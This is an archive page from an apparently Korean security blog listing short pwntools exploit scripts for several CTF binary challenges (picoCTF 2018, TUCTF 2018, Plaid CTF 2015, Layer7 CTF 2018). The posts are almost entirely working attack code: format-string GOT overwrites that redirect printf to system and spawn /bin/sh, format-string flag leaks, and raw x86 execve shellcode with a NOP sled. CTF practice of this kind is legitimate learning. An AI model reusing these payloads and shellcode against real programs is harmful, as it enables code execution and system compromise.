pico CTF 2018 echo back

System/Pwnable Practice 2019. 8. 12. 20:58

exploit.py


from pwn import *

p = process('./echoback')
e = ELF('./echoback')

vuln_low = 0x85ab
vuln_high = 0x10804
system_got_low = 0x8460
system_got_high = 0x10804
puts_got = e.got['puts']
printf_got = e.got['printf']

payload = p32(puts_got)
payload += p32(puts_got + 2)
payload += '%{}x'.format(vuln_low - 8)
payload += "%7$hn"
payload += '%{}x'.format(vuln_high - vuln_low)
payload += "%8$hn"
p.sendlineafter('\n', payload)

payload2 = p32(printf_got)
payload2 += p32(printf_got+2)
payload2 += "%{}x".format(system_got_low-8)
payload2 += "%7$hn"
payload2 += '%{}x'.format(system_got_high - system_got_low)
payload2 += "%8$hn"

p.sendlineafter("message:\n",payload2)
p.sendlineafter("message:\n","/bin/sh\x00")
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

TU CTF 2018 timber  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Advanced PHP .htaccess Research

2019. 8. 10. 21:02

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

picoCTF 2018 authenticate

System/Pwnable Practice 2019. 8. 10. 00:05

exploit.py

 

from pwn import *
 
p = process("./auth")

auth_variable = 0x0804A04C

payload = p32(auth_variable)
payload += "%11$n"

p.sendlineafter("\n",payload)

print p.recv()

 

'System > Pwnable Practice' 카테고리의 다른 글

TU CTF 2018 timber  (0) 2019.08.12
pico CTF 2018 echo back  (0) 2019.08.12
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

TUCTF CTF 2018 Ehh

System/Pwnable Practice 2019. 8. 9. 23:30

exploit.py

 

from pwn import *
 
p = process("./ehh")

p.recvuntil("here< ")
protect_addr = int(p.recv(10),16)

payload = p32(protect_addr)
payload += "%20x"
payload += "%6$n"

p.recv()
sleep(0.1)
p.sendline(payload)
sleep(0.1)
print p.recv()

'System > Pwnable Practice' 카테고리의 다른 글

pico CTF 2018 echo back  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Same Origin Policy Bypass With DNS Rebinding

2019. 8. 9. 02:23

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

SSRF Filter Bypass With DNS Rebinding

2019. 8. 8. 21:38

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Plaid CTF 2015 ebp

System/Pwnable Practice 2019. 8. 6. 21:39

exploit.py


from pwn import *

p = process("./ebp")
e = ELF('./ebp')

payload = "%{0}p%4$n".format(e.got['fgets'])

p.sendline(payload)
p.recv(2048)

bufAddr = 0x0804A080
payload2 = "%{0}p%12$n".format(bufAddr+30)
payload2 += "\x90"*100
payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

p.sendline(payload2)
p.recv(2048)

p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

picoCTF 2018 authenticate  (0) 2019.08.10
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

PHP SoapClient SSRF

2019. 8. 6. 20:20

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

Layer7 CTF 2018 Life Game

System/Pwnable Practice 2019. 8. 5. 02:27

exploit.py


from pwn import *
  
for i in range(0,100):
	try:
		p = process("./life_game")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","-10000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","4")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","1000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","31337")
		p.sendlineafter("The last one\n","%"+str(i)+"$s")
		print p.recv()
		p.close()
	except:
		"fail"
		p.close()


'System > Pwnable Practice' 카테고리의 다른 글

TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Pico CTF 2018 echooo  (0) 2019.08.04
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Pico CTF 2018 echooo

System/Pwnable Practice 2019. 8. 4. 23:34

exploit.py


from pwn import *
  
p = process("./echo")

for i in range(1,100):
    try:
        p = process("./echo")
        payload ="%"+str(i)+"$s"
        p.sendlineafter("> ",payload)
        result = p.recv(2048)
        if "picoCTF" in result:
            print result
            break
        p.close()
    except:
        print "fail"
        p.close()


'System > Pwnable Practice' 카테고리의 다른 글

Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2019/08   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

티스토리툴바